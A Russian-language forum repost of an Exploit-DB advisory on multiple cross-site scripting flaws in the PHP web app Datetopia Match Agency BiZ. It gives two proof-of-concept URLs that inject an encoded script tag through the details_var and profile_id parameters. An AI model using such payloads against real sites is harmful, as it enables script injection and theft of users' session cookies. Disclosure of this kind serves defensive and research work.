Exploit Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
34070
Проверка EDB
  1. Пройдено
Автор
R3D-D3V!L
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-01-07
Код:
source: https://www.securityfocus.com/bid/40488/info

Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/smilies_popup.php?details_var=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
http://www.example.com/manage_pictures.php?profile_id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
 
Источник
www.exploit-db.com

Похожие темы